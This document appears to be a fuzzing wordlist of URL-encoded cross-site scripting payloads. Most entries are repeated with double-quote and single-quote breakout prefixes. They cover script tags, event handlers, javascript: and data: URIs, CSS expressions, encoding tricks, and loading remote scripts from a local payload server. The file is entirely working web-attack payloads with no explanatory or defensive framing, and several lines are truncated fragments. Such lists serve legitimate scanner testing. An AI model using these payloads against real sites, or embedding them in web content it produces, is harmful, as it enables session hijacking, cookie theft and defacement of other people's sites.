'%3E%3CSTYLE%20type=%22text/css%22%3EBODY%7Bbackground:url(%22javascript:alert('X')%22)%7D%3C/STYLE%3E
%3CX%20STYLE=%22X:expression(alert('X'))%22%3E
%22%3E%3CX%20STYLE=%22X:expression(alert('X'))%22%3E
'%3E%3CX%20STYLE=%22X:expression(alert('X'))%22%3E
%3CX%20STYLE=%22behavior:%20url(X.htc);%22%3E
%22%3E%3CX%20STYLE=%22behavior:%20url(X.htc);%22%3E
'%3E%3CX%20STYLE=%22behavior:%20url(X.htc);%22%3E
%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;url=javascript:alert('X');%22%3E
%22%3E%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;url=javascript:alert('X');%22%3E
'%3E%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;url=javascript:alert('X');%22%3E
%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;url=data:text/html%20base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==%22%3E
%22%3E%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;url=data:text/html%20base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==%22%3E
'%3E%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;url=data:text/html%20base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==%22%3E
%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;%20URL=http://;URL=javascript:alert('X');%22%3E
%22%3E%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;%20URL=http://;URL=javascript:alert('X');%22%3E
'%3E%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;%20URL=http://;URL=javascript:alert('X');%22%3E
%3CIFRAME%20SRC=%22javascript:alert('X');%22%3E%3C/IFRAME%3E
%22%3E%3CIFRAME%20SRC=%22javascript:alert('X');%22%3E%3C/IFRAME%3E
'%3E%3CIFRAME%20SRC=%22javascript:alert('X');%22%3E%3C/IFRAME%3E
%3CIFRAME%20SRC=
%22%3E%3CIFRAME%20SRC=
'%3E%3CIFRAME%20SRC=
%3CFRAMESET%3E%3CFRAME%20SRC=%22javascript:alert('X');%22%3E%3C/FRAMESET%3E
%22%3E%3CFRAMESET%3E%3CFRAME%20SRC=%22javascript:alert('X');%22%3E%3C/FRAMESET%3E
'%3E%3CFRAMESET%3E%3CFRAME%20SRC=%22javascript:alert('X');%22%3E%3C/FRAMESET%3E
%3CTABLE%20BACKGROUND=%22javascript:alert('X')%22%3E
%22%3E%3CTABLE%20BACKGROUND=%22javascript:alert('X')%22%3E
'%3E%3CTABLE%20BACKGROUND=%22javascript:alert('X')%22%3E
%3CTABLE%3E%3CTD%20BACKGROUND=%22javascript:alert('X')%22%3E
%22%3E%3CTABLE%3E%3CTD%20BACKGROUND=%22javascript:alert('X')%22%3E
'%3E%3CTABLE%3E%3CTD%20BACKGROUND=%22javascript:alert('X')%22%3E
%3CDIV%20STYLE=%22background-image:%20url(javascript:alert('X'))%22%3E
%22%3E%3CDIV%20STYLE=%22background-image:%20url(javascript:alert('X'))%22%3E
'%3E%3CDIV%20STYLE=%22background-image:%20url(javascript:alert('X'))%22%3E
%3CDIV%20STYLE=%22width:%20expression(alert('X'));%22%3E
%22%3E%3CDIV%20STYLE=%22width:%20expression(alert('X'));%22%3E
'%3E%3CDIV%20STYLE=%22width:%20expression(alert('X'));%22%3E
%3CBASE%20HREF=%22javascript:alert('X');//%22%3E
%22%3E%3CBASE%20HREF=%22javascript:alert('X');//%22%3E
'%3E%3CBASE%20HREF=%22javascript:alert('X');//%22%3E
%3Cobject%20type=%22text/x-scriptlet%22%20data=%22http://127.0.0.1:3555/xss_serve_payloads/X.js%22%3E%3C/object%3E
%22%3E%3Cobject%20type=%22text/x-scriptlet%22%20data=%22http://127.0.0.1:3555/xss_serve_payloads/X.js%22%3E%3C/object%3E
'%3E%3Cobject%20type=%22text/x-scriptlet%22%20data=%22http://127.0.0.1:3555/xss_serve_payloads/X.js%22%3E%3C/object%3E
%3Cobject%20type=%22text/x-scriptlet%22%20data=%22http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp%22%3E%3C/object%3E
%22%3E%3Cobject%20type=%22text/x-scriptlet%22%20data=%22http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp%22%3E%3C/object%3E
'%3E%3Cobject%20type=%22text/x-scriptlet%22%20data=%22http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp%22%3E%3C/object%3E
%3COBJECT%20TYPE=%22text/x-scriptlet%22%20DATA=%22http://127.0.0.1:3555/xss_serve_payloads/X.html%22%3E%3C/OBJECT%3E
%22%3E%3COBJECT%20TYPE=%22text/x-scriptlet%22%20DATA=%22http://127.0.0.1:3555/xss_serve_payloads/X.html%22%3E%3C/OBJECT%3E
'%3E%3COBJECT%20TYPE=%22text/x-scriptlet%22%20DATA=%22http://127.0.0.1:3555/xss_serve_payloads/X.html%22%3E%3C/OBJECT%3E
%3CEMBED%20SRC=%22data:image/svg+xml;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==%22%20type=%22image/svg+xml%22%20AllowScriptAccess=%22always%22%3E%3C/EMBED%3E
%22%3E%3CEMBED%20SRC=%22data:image/svg+xml;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==%22%20type=%22image/svg+xml%22%20AllowScriptAccess=%22always%22%3E%3C/EMBED%3E
'%3E%3CEMBED%20SRC=%22data:image/svg+xml;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==%22%20type=%22image/svg+xml%22%20AllowScriptAccess=%22always%22%3E%3C/EMBED%3E
%3CSCRIPT%20SRC=%22http://127.0.0.1:3555/xss_serve_payloads/X.jpg%22%3E%3C/SCRIPT%3E
%22%3E%3CSCRIPT%20SRC=%22http://127.0.0.1:3555/xss_serve_payloads/X.jpg%22%3E%3C/SCRIPT%3E
'%3E%3CSCRIPT%20SRC=%22http://127.0.0.1:3555/xss_serve_payloads/X.jpg%22%3E%3C/SCRIPT%3E
%3C!--
%22%3E%3C!--
'%3E%3C!--
%3C?%20echo('%3CSCR)';echo('IPT%3Ealert(%22X%22)%3C/SCRIPT%3E');%20?%3E
%22%3E%3C?%20echo('%3CSCR)';echo('IPT%3Ealert(%22X%22)%3C/SCRIPT%3E');%20?%3E
'%3E%3C?%20echo('%3CSCR)';echo('IPT%3Ealert(%22X%22)%3C/SCRIPT%3E');%20?%3E
Redirect%20302%20/axaaX.jpg%20http://127.0.0.1:3555/xss_serve_payloads/X.html
%3CMETA%20HTTP-EQUIV=%22Set-Cookie%22%20Content=%22USERID=%3CSCRIPT%3Ealert('X')%3C/SCRIPT%3E%22%3E
%22%3E%3CMETA%20HTTP-EQUIV=%22Set-Cookie%22%20Content=%22USERID=%3CSCRIPT%3Ealert('X')%3C/SCRIPT%3E%22%3E
'%3E%3CMETA%20HTTP-EQUIV=%22Set-Cookie%22%20Content=%22USERID=%3CSCRIPT%3Ealert('X')%3C/SCRIPT%3E%22%3E
%20%3CHEAD%3E%3CMETA%20HTTP-EQUIV=%22CONTENT-TYPE%22%20CONTENT=%22text/html;%20charset=UTF-7%22%3E%20%3C/HEAD%3E+ADw-SCRIPT+AD4-alert('X');+ADw-/SCRIPT+AD4-
%3CA%20HREF=%22http://127.0.0.1/%22%3EX%3C/A%3E
%22%3E%3CA%20HREF=%22http://127.0.0.1/%22%3EX%3C/A%3E
'%3E%3CA%20HREF=%22http://127.0.0.1/%22%3EX%3C/A%3E
%3CA%20HREF=%22http://0x42.0x0000066.0x7.0x93/%22%3EX%3C/A%3E
%22%3E%3CA%20HREF=%22http://0x42.0x0000066.0x7.0x93/%22%3EX%3C/A%3E
'%3E%3CA%20HREF=%22http://0x42.0x0000066.0x7.0x93/%22%3EX%3C/A%3E
%3CA%20HREF=%22http://0102.0146.0007.00000223/%22%3EX%3C/A%3E
%22%3E%3CA%20HREF=%22http://0102.0146.0007.00000223/%22%3EX%3C/A%3E
'%3E%3CA%20HREF=%22http://0102.0146.0007.00000223/%22%3EX%3C/A%3E
%3CA%20HREF=%22http://66.000146.0x7.147/%22%3EX%3C/A%3E
%22%3E%3CA%20HREF=%22http://66.000146.0x7.147/%22%3EX%3C/A%3E
'%3E%3CA%20HREF=%22http://66.000146.0x7.147/%22%3EX%3C/A%3E
%3Csvg%3E%3Cstyle%3E%7Bfont-family:'%3Ciframe/onload=confirm(1)%3E'
%22%3E%3Csvg%3E%3Cstyle%3E%7Bfont-family:'%3Ciframe/onload=confirm(1)%3E'
'%3E%3Csvg%3E%3Cstyle%3E%7Bfont-family:'%3Ciframe/onload=confirm(1)%3E'
%3Cinput/onmouseover=%22javaSCRIPT:confirm(1)%22
%22%3E%3Cinput/onmouseover=%22javaSCRIPT:confirm(1)%22
'%3E%3Cinput/onmouseover=%22javaSCRIPT:confirm(1)%22
%3Cform%3E%3Cisindex%20formaction=%22javascript:confirm(1)%22
%22%3E%3Cform%3E%3Cisindex%20formaction=%22javascript:confirm(1)%22
'%3E%3Cform%3E%3Cisindex%20formaction=%22javascript:confirm(1)%22
%3Cscript/ %20src='http://127.0.0.1:3555/xss_serve_payloads/X.js'%20/	%3E%3C/script%3E
%22%3E%3Cscript/ %20src='http://127.0.0.1:3555/xss_serve_payloads/X.js'%20/	%3E%3C/script%3E
'%3E%3Cscript/ %20src='http://127.0.0.1:3555/xss_serve_payloads/X.js'%20/	%3E%3C/script%3E
%3Cscript/ %20src='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp'%20/	%3E%3C/script%3E
%22%3E%3Cscript/ %20src='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp'%20/	%3E%3C/script%3E
'%3E%3Cscript/ %20src='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp'%20/	%3E%3C/script%3E
%3CScRipT%205-03+9/3=%3Eprompt(1)%3C/ScRipT%20giveanswerhere=?
%22%3E%3CScRipT%205-03+9/3=%3Eprompt(1)%3C/ScRipT%20giveanswerhere=?
'%3E%3CScRipT%205-03+9/3=%3Eprompt(1)%3C/ScRipT%20giveanswerhere=?
%3Ciframe/src=%22data:text/html; base64 ,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==%22%3E
%22%3E%3Ciframe/src=%22data:text/html; base64 ,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==%22%3E
'%3E%3Ciframe/src=%22data:text/html; base64 ,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==%22%3E
%3Ciframe/src=%22data:text/html,%3Csvg%20&
%22%3E%3Ciframe/src=%22data:text/html,%3Csvg%20&
'%3E%3Ciframe/src=%22data:text/html,%3Csvg%20&
%3Cmeta%20content=%22
%201%20
;%20JAVASCRIPT:%20alert(1)%22%20http-equiv=%22refresh%22/%3E
%22%3E%3Cmeta%20content=%22
%201%20
;%20JAVASCRIPT:%20alert(1)%22%20http-equiv=%22refresh%22/%3E
'%3E%3Cmeta%20content=%22
%201%20
;%20JAVASCRIPT:%20alert(1)%22%20http-equiv=%22refresh%22/%3E
%3Csvg%3E%3Cscript%20xlink:href=data:,window.open('https://127.0.0.1:3555/xss_serve_payloads/X.html')%3E%3C/script
%22%3E%3Csvg%3E%3Cscript%20xlink:href=data:,window.open('https://127.0.0.1:3555/xss_serve_payloads/X.html')%3E%3C/script
'%3E%3Csvg%3E%3Cscript%20xlink:href=data:,window.open('https://127.0.0.1:3555/xss_serve_payloads/X.html')%3E%3C/script
%3Csvg%3E%3Cscript%20x:href='http://127.0.0.1:3555/xss_serve_payloads/X.js'
%22%3E%3Csvg%3E%3Cscript%20x:href='http://127.0.0.1:3555/xss_serve_payloads/X.js'
'%3E%3Csvg%3E%3Cscript%20x:href='http://127.0.0.1:3555/xss_serve_payloads/X.js'
%3Csvg%3E%3Cscript%20x:href='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp'
%22%3E%3Csvg%3E%3Cscript%20x:href='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp'
'%3E%3Csvg%3E%3Cscript%20x:href='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp'
%3Cmeta%20http-equiv=%22refresh%22%20content=%220;url=javascript:confirm(1)%22%3E
%22%3E%3Cmeta%20http-equiv=%22refresh%22%20content=%220;url=javascript:confirm(1)%22%3E
'%3E%3Cmeta%20http-equiv=%22refresh%22%20content=%220;url=javascript:confirm(1)%22%3E
%3Ciframe%20src=javascript:alert(document.location)%3E
%22%3E%3Ciframe%20src=javascript:alert(document.location)%3E
'%3E%3Ciframe%20src=javascript:alert(document.location)%3E
%3Cform%3E%3Ca%20href=%22javascript:/u0061lert&
%22%3E%3Cform%3E%3Ca%20href=%22javascript:/u0061lert&
'%3E%3Cform%3E%3Ca%20href=%22javascript:/u0061lert&
%3Cimg/&
%22%3E%3Cimg/&
'%3E%3Cimg/&
%3Cform%3E%3Ciframe%20&
%22%3E%3Cform%3E%3Ciframe%20&
'%3E%3Cform%3E%3Ciframe%20&
%3Ca%20href=%22data:application/x-x509-user-cert;
base64
,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==%22&
%22%3E%3Ca%20href=%22data:application/x-x509-user-cert;
base64
,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==%22&
'%3E%3Ca%20href=%22data:application/x-x509-user-cert;
base64
,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==%22&
http://www.keralacyberforce%3Cscript%20.in%3Ealert(document.location)%3C/script
%3Ca&
%22%3E%3Ca&
'%3E%3Ca&
%3Cimg/src=@&
%22%3E%3Cimg/src=@&
'%3E%3Cimg/src=@&
%3Cstyle/onload=prompt&
%22%3E%3Cstyle/onload=prompt&
'%3E%3Cstyle/onload=prompt&
%3Cscript%20%5E__%5E%3Ealert(String.fromCharCode(49))%3C/script%20%5E__%5E
%22%3E%3Cscript%20%5E__%5E%3Ealert(String.fromCharCode(49))%3C/script%20%5E__%5E
'%3E%3Cscript%20%5E__%5E%3Ealert(String.fromCharCode(49))%3C/script%20%5E__%5E
%3C/style%20&
%22%3E%3C/style%20&
'%3E%3C/style%20&
%3Cform%3E%3Ctextarea%20&
%22%3E%3Cform%3E%3Ctextarea%20&
'%3E%3Cform%3E%3Ctextarea%20&
%3Cscript%20//%3E//confirm('/uFF41/uFF4C/uFF45/uFF52/uFF54/u1455/uFF11/u1450')//%3C/script%20//
%22%3E%3Cscript%20//%3E//confirm('/uFF41/uFF4C/uFF45/uFF52/uFF54/u1455/uFF11/u1450')//%3C/script%20//
'%3E%3Cscript%20//%3E//confirm('/uFF41/uFF4C/uFF45/uFF52/uFF54/u1455/uFF11/u1450')//%3C/script%20/***/
%3Ciframe%20srcdoc='<body%20onload=prompt(1)>'%3E
%22%3E%3Ciframe%20srcdoc='<body%20onload=prompt(1)>'%3E
'%3E%3Ciframe%20srcdoc='<body%20onload=prompt(1)>'%3E
%3Ca%20href=%22javascript:void(0)%22%20onmouseover=
javascript:alert(1)
%3EX%3C/a%3E
%22%3E%3Ca%20href=%22javascript:void(0)%22%20onmouseover=
javascript:alert(1)
%3EX%3C/a%3E
'%3E%3Ca%20href=%22javascript:void(0)%22%20onmouseover=
javascript:alert(1)
%3EX%3C/a%3E
%3Cstyle/onload=<!--&
%22%3E%3Cstyle/onload=<!--&
'%3E%3Cstyle/onload=<!--&
%3C///style///%3E%3Cspan%20%2F%20onmousemove='alert(1)'%3ESPAN
%22%3E%3C///style///%3E%3Cspan%20%2F%20onmousemove='alert(1)'%3ESPAN
'%3E%3C///style///%3E%3Cspan%20%2F%20onmousemove='alert(1)'%3ESPAN
%3Cimg/src='http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg'%20onmouseover=	prompt(1)
%22%3E%3Cimg/src='http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg'%20onmouseover=	prompt(1)
'%3E%3Cimg/src='http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg'%20onmouseover=	prompt(1)
%3Cmarquee%20onstart='javascript:alert&
%22%3E%3Cmarquee%20onstart='javascript:alert&
'%3E%3Cmarquee%20onstart='javascript:alert&
%3Cdiv/style=%22width:expression(confirm(1))%22%3EX%3C/div%3E
%22%3E%3Cdiv/style=%22width:expression(confirm(1))%22%3EX%3C/div%3E
'%3E%3Cdiv/style=%22width:expression(confirm(1))%22%3EX%3C/div%3E%20%7BIE7%7D
'%3E%3Cdiv/style=%22width:expression(confirm(1))%22%3EX%3C/div%3E
//%3Cform/action=javascript&
/iframe/src/%3Ciframe/src=%22%3Ciframe/src=@%22/onload=prompt(1)%20/iframe/src/%3E
//%7C//%20%3Cscript%20//%7C//%20src='http://127.0.0.1:3555/xss_serve_payloads/X.js'%3E%20//%7C//%20%3C/script%20//%7C//
//%7C//%20%3Cscript%20//%7C//%20src='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp'%3E%20//%7C//%20%3C/script%20//%7C//
%3C/font%3E/%3Csvg%3E%3Cstyle%3E%7Bsrc&
%22%3E%3C/font%3E/%3Csvg%3E%3Cstyle%3E%7Bsrc&
'%3E%3C/font%3E/%3Csvg%3E%3Cstyle%3E%7Bsrc&
%3Ca/href=%22javascript:&
%22%3E%3Ca/href=%22javascript:&
){kind=link}
'%3E%3Ca/href=%22javascript:&
%3C/plaintext/%3E%3C/%7C/%3E%3Cplaintext/onmouseover=prompt(1)
'%3E%3C/plaintext/%3E%3C/%7C/%3E%3Cplaintext/onmouseover=prompt(1)
%3C/svg%3E''%3Csvg%3E%3Cscript%20'AQuickBrownFoxJumpsOverTheLazyDog'%3Ealert&
%22%3E%3C/svg%3E''%3Csvg%3E%3Cscript%20'AQuickBrownFoxJumpsOverTheLazyDog'%3Ealert&
'%3E%3C/svg%3E''%3Csvg%3E%3Cscript%20'AQuickBrownFoxJumpsOverTheLazyDog'%3Ealert&
%3Ca%20href=%22javascript:/u0061&
%22%3E%3Ca%20href=%22javascript:/u0061&
'%3E%3Ca%20href=%22javascript:/u0061&
%3Cdiv%20onmouseover='alert(1)'%3EDIV%3C/div%3E
%22%3E%3Cdiv%20onmouseover='alert(1)'%3EDIV%3C/div%3E
'%3E%3Cdiv%20onmouseover='alert(1)'%3EDIV%3C/div%3E
%22%3E%3C
'%3E%3C
%3Ca%20href=%22jAvAsCrIpT:alert(1)%22%3EX%3C/a%3E
%22%3E%3Ca%20href=%22jAvAsCrIpT:alert(1)%22%3EX%3C/a%3E
'%3E%3Ca%20href=%22jAvAsCrIpT:alert(1)%22%3EX%3C/a%3E
%3Ca%20href=javascript:alert(document.cookie)%3EX%3C/a%3E
%22%3E%3Ca%20href=javascript:alert(document.cookie)%3EX%3C/a%3E
'%3E%3Ca%20href=javascript:alert(document.cookie)%3EX%3C/a%3E
%3Cimg%20src=%22/%22%20==%22%20title=%22onerror='prompt(1)'%22%3E
%22%3E%3Cimg%20src=%22/%22%20==%22%20title=%22onerror='prompt(1)'%22%3E
'%3E%3Cimg%20src=%22/%22%20==%22%20title=%22onerror='prompt(1)'%22%3E
%3Cscript%20src=%22data:text/javascript,alert(1)%22%3E%3C/script%3E
%22%3E%3Cscript%20src=%22data:text/javascript,alert(1)%22%3E%3C/script%3E
'%3E%3Cscript%20src=%22data:text/javascript,alert(1)%22%3E%3C/script%3E
%3Ciframe/src%20////onload%20=%20prompt(1)
%22%3E%3Ciframe/src%20////onload%20=%20prompt(1)
'%3E%3Ciframe/src%20////onload%20=%20prompt(1)
%3Ciframe/onreadystatechange=alert(1)
%22%3E%3Ciframe/onreadystatechange=alert(1)
'%3E%3Ciframe/onreadystatechange=alert(1)
%3Csvg/onload=alert(1)
%22%3E%3Csvg/onload=alert(1)
'%3E%3Csvg/onload=alert(1)
%3Cinput%20value=%3C%3E%3Ciframe/src=javascript:confirm(1)
%22%3E%3Cinput%20value=%3C%3E%3Ciframe/src=javascript:confirm(1)
'%3E%3Cinput%20value=%3C%3E%3Ciframe/src=javascript:confirm(1)
%3Cinput%20type=%22text%22%20value=%60%60%20%3Cdiv/onmouseover='alert(1)'%3EX%3C/div%3E
%22%3E%3Cinput%20type=%22text%22%20value=%60%60%20%3Cdiv/onmouseover='alert(1)'%3EX%3C/div%3E
'%3E%3Cinput%20type=%22text%22%20value=%60%60%20%3Cdiv/onmouseover='alert(1)'%3EX%3C/div%3E
http://www.%3Cscript%3Ealert(1)%3C/script%20.com
%3Ciframe%20src=j
a
v
a
s
c
r
i
p
t
:a
l
e
r
t
28
1
%29%3E%3C/iframe%3E
%22%3E%3Ciframe%20src=j
a
v
a
s
c
r
i
p
t
:a
l
e
r
t
28
1
%29%3E%3C/iframe%3E
'%3E%3Ciframe%20src=j
a
v
a
s
c
r
i
p
t
:a
l
e
r
t
28
1
%29%3E%3C/iframe%3E
%3Csvg%3E%3Cscript%20?%3Ealert(1)
%22%3E%3Csvg%3E%3Cscript%20?%3Ealert(1)
'%3E%3Csvg%3E%3Cscript%20?%3Ealert(1)
%3Ciframe%20src=j a v a s c r i p t :a l e r t %28 1 %29%3E%3C/iframe%3E
%22%3E%3Ciframe%20src=j a v a s c r i p t :a l e r t %28 1 %29%3E%3C/iframe%3E
'%3E%3Ciframe%20src=j a v a s c r i p t :a l e r t %28 1 %29%3E%3C/iframe%3E
%3Cimg%20src=%60xx:xx%60onerror=alert(1)%3E
%22%3E%3Cimg%20src=%60xx:xx%60onerror=alert(1)%3E
'%3E%3Cimg%20src=%60xx:xx%60onerror=alert(1)%3E
%3Cmath%3E%3Ca%20xlink:href=%22//127.0.0.1:3555/xss_serve_payloads/X.js%22%3EX
%22%3E%3Cmath%3E%3Ca%20xlink:href=%22//127.0.0.1:3555/xss_serve_payloads/X.js%22%3EX
'%3E%3Cmath%3E%3Ca%20xlink:href=%22//127.0.0.1:3555/xss_serve_payloads/X.js%22%3EX
%3Cmath%3E%3Ca%20xlink:href=%22//127.0.0.1:3555/xss_serve_payloads/bmpz.bmp%22%3EX
%22%3E%3Cmath%3E%3Ca%20xlink:href=%22//127.0.0.1:3555/xss_serve_payloads/bmpz.bmp%22%3EX
'%3E%3Cmath%3E%3Ca%20xlink:href=%22//127.0.0.1:3555/xss_serve_payloads/bmpz.bmp%22%3EX
%3Cembed%20code=%22http://127.0.0.1:3555/xss_serve_payloads/X.swf%22%20allowscriptaccess=always%3E
%22%3E%3Cembed%20code=%22http://127.0.0.1:3555/xss_serve_payloads/X.swf%22%20allowscriptaccess=always%3E
'%3E%3Cembed%20code=%22http://127.0.0.1:3555/xss_serve_payloads/X.swf%22%20allowscriptaccess=always%3E
%3Csvg%20contentScriptType=text/vbs%3E%3Cscript%3EMsgBox+1
%22%3E%3Csvg%20contentScriptType=text/vbs%3E%3Cscript%3EMsgBox+1
'%3E%3Csvg%20contentScriptType=text/vbs%3E%3Cscript%3EMsgBox+1
%3Ca%20href=%22data:text/html;base64,%3Csvg/onload=/u0061&
%22%3E%3Ca%20href=%22data:text/html;base64_,%3Csvg/onload=/u0061&
'%3E%3Ca%20href=%22data:text/html;base64_,%3Csvg/onload=/u0061&
%3Ciframe/onreadystatechange=/u0061/u006C/u0065/u0072/u0074('/u0061')%20worksinIE%3E
%22%3E%3Ciframe/onreadystatechange=/u0061/u006C/u0065/u0072/u0074('/u0061')%20worksinIE%3E
'%3E%3Ciframe/onreadystatechange=/u0061/u006C/u0065/u0072/u0074('/u0061')%20worksinIE%3E
%3Cscript%3E~'/u0061'%20;%20/u0074/u0068/u0072/u006F/u0077%20~%20/u0074/u0068/u0069/u0073.%20/u0061/u006C/u0065/u0072/u0074('/u0061')%3C/script%20U+'/u0061'%20;%20/u0074/u0068/u0072/u006F/u0077%20~%20/u0074/u0068/u0069/u0073.%20/u0061/u006C/u0065/u0072/u0074(
%22%3E%3Cscript%3E'/u0061')%3C/script%20U+'/u0061'%20;%20/u0074/u0068/u0072/u006F/u0077%20~%20/u0074/u0068/u0069/u0073.%20/u0061/u006C/u0065/u0072/u0074(~'/u0061')%3C/script%20U+
'%3E%3Cscript%3E
%3Cscript/src=%22data:text%2Fj/u0061v/u0061script,/u0061lert('/u0061')%22%3E%3C/script%20a=/u0061%20&%20/=%2F
%22%3E%3Cscript/src=%22data:text%2Fj/u0061v/u0061script,/u0061lert('/u0061')%22%3E%3C/script%20a=/u0061%20&%20/=%2F
'%3E%3Cscript/src=%22data:text%2Fj/u0061v/u0061script,/u0061lert('/u0061')%22%3E%3C/script%20a=/u0061%20&%20/=%2F
%3Cobject%20data=javascript:/u0061&
%22%3E%3Cobject%20data=javascript:/u0061&
'%3E%3Cobject%20data=javascript:/u0061&
%3Cscript%3E+-+-1-+-+alert(1)%3C/script%3E
%22%3E%3Cscript%3E+-+-1-+-+alert(1)%3C/script%3E
'%3E%3Cscript%3E+-+-1-+-+alert(1)%3C/script%3E
%3Cbody/onload=<!-->&
%22%3E%3Cbody/onload=<!-->&
'%3E%3Cbody/onload=<!-->&
%3Cscript%20allbrowserX%3E/%3Cscript%20*/alert(1)%3C/script
%22%3E%3Cscript%20allbrowserX%3E/%3Cscript%20*/alert(1)%3C/script
'%3E%3Cscript%20allbrowserX%3E/%3Cscript%20*/alert(1)%3C/script
%3Cimg%20src%20?X?\x5C/onerror%20=%20alert(1)
%22%3E%3Cimg%20src%20?X?\x5C/onerror%20=%20alert(1)
'%3E%3Cimg%20src%20?X?\x5C/onerror%20=%20alert(1)
%3Csvg%3E%3Cscript%3E//
confirm(1);%3C/script%20%3C/svg%3E
%22%3E%3Csvg%3E%3Cscript%3E//
confirm(1);%3C/script%20%3C/svg%3E
'%3E%3Csvg%3E%3Cscript%3E//
confirm(1);%3C/script%20%3C/svg%3E
%3Csvg%3E%3Cscript%20onlypossibleinopera:-)%3E%20alert(1)
%22%3E%3Csvg%3E%3Cscript%20onlypossibleinopera:-)%3E%20alert(1)
'%3E%3Csvg%3E%3Cscript%20onlypossibleinopera:-)%3E%20alert(1)
%3Cscript%20x%3E%20alert(1)%20%3C/script%201=2
%22%3E%3Cscript%20x%3E%20alert(1)%20%3C/script%201=2
'%3E%3Cscript%20x%3E%20alert(1)%20%3C/script%201=2
%3Cdiv/onmouseover='alert(1)'%3E%20style=%22x:%22%3E
%22%3E%3Cdiv/onmouseover='alert(1)'%3E%20style=%22x:%22%3E
'%3E%3Cdiv/onmouseover='alert(1)'%3E%20style=%22x:%22%3E
%3C--%60%3Cimg/src=%60%20onerror=alert(1)%3E%20--!%3E
%22%3E%3C--%60%3Cimg/src=%60%20onerror=alert(1)%3E%20--!%3E
'%3E%3C--%60%3Cimg/src=%60%20onerror=alert(1)%3E%20--!%3E
%3Cdiv%20style=%22position:absolute;top
%22%3E%3Cdiv%20style=%22position:absolute;top
'%3E%3Cdiv%20style=%22position:absolute;top
%3Cimg%20src=x%20onerror=window.open('http://127.0.0.1:3555/xss_serve_payloads/X.html');%3E
%22%3E%3Cimg%20src=x%20onerror=window.open('http://127.0.0.1:3555/xss_serve_payloads/X.html');%3E
'%3E%3Cimg%20src=x%20onerror=window.open('http://127.0.0.1:3555/xss_serve_payloads/X.html');%3E
%3Cform%3E%3Cbutton%20formaction=javascript:alert(1)%3EX
%22%3E%3Cform%3E%3Cbutton%20formaction=javascript:alert(1)%3EX
'%3E%3Cform%3E%3Cbutton%20formaction=javascript:alert(1)%3EX
%3Ciframe%20src=%22data:text/html,%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3E%3C/iframe%3E
%22%3E%3Ciframe%20src=%22data:text/html,%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3E%3C/iframe%3E
'%3E%3Ciframe%20src=%22data:text/html,%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3E%3C/iframe%3E
w=window.open('invalidfileinvalidfileinvalidfile','target');setTimeout('alert(w.document.location);w.close();',1);
try%7Balert(1)%7Dcatch(e)%7Blocation.reload()%7D
%3Cdiv%20id=%22alert('/X/')%22%20style=%22x:expression(eval)(id)%22%3E
%22%3E%3Cdiv%20id=%22alert('/X/')%22%20style=%22x:expression(eval)(id)%22%3E
'%3E%3Cdiv%20id=%22alert('/X/')%22%20style=%22x:expression(eval)(id)%22%3E
0/%22))%7Dcatch(e)%7Balert(1)%7D//
%3Cimg%20language=vbs%20src=%3Cb%20onerror=alert
%22%3E%3Cimg%20language=vbs%20src=%3Cb%20onerror=alert
'%3E%3Cimg%20language=vbs%20src=%3Cb%20onerror=alert
%3Cscript%3Ealert(1)/X/'%3C/script%3E
%22%3E%3Cscript%3Ealert(1)/X/'%3C/script%3E
'%3E%3Cscript%3Ealert(1)/X/'%3C/script%3E
%3Cscript%3Ealert(1)%3C!--%20'%3C/script%3E
%22%3E%3Cscript%3Ealert(1)%3C!--%20'%3C/script%3E
'%3E%3Cscript%3Ealert(1)%3C!--%20'%3C/script%3E
%3Cscript%3E%20var%20a%20=%20%22X%22;%20alert(1);%20%3C/script%3E
%22%3E%3Cscript%3E%20var%20a%20=%20%22X%22;%20alert(1);%20%3C/script%3E
'%3E%3Cscript%3E%20var%20a%20=%20%22X%22;%20alert(1);%20%3C/script%3E
%3Cscript%3E%20var%20a=1';%20alert(1);%20%3C/script%3E
%22%3E%3Cscript%3E%20var%20a=1';%20alert(1);%20%3C/script%3E
'%3E%3Cscript%3E%20var%20a=1';%20alert(1);%20%3C/script%3E
%3Cscript%3E%20var%20x%20=%20%22X/%22;%20alert(1);%20%3C/script%3E
%22%3E%3Cscript%3E%20var%20x%20=%20%22X/%22;%20alert(1);%20%3C/script%3E
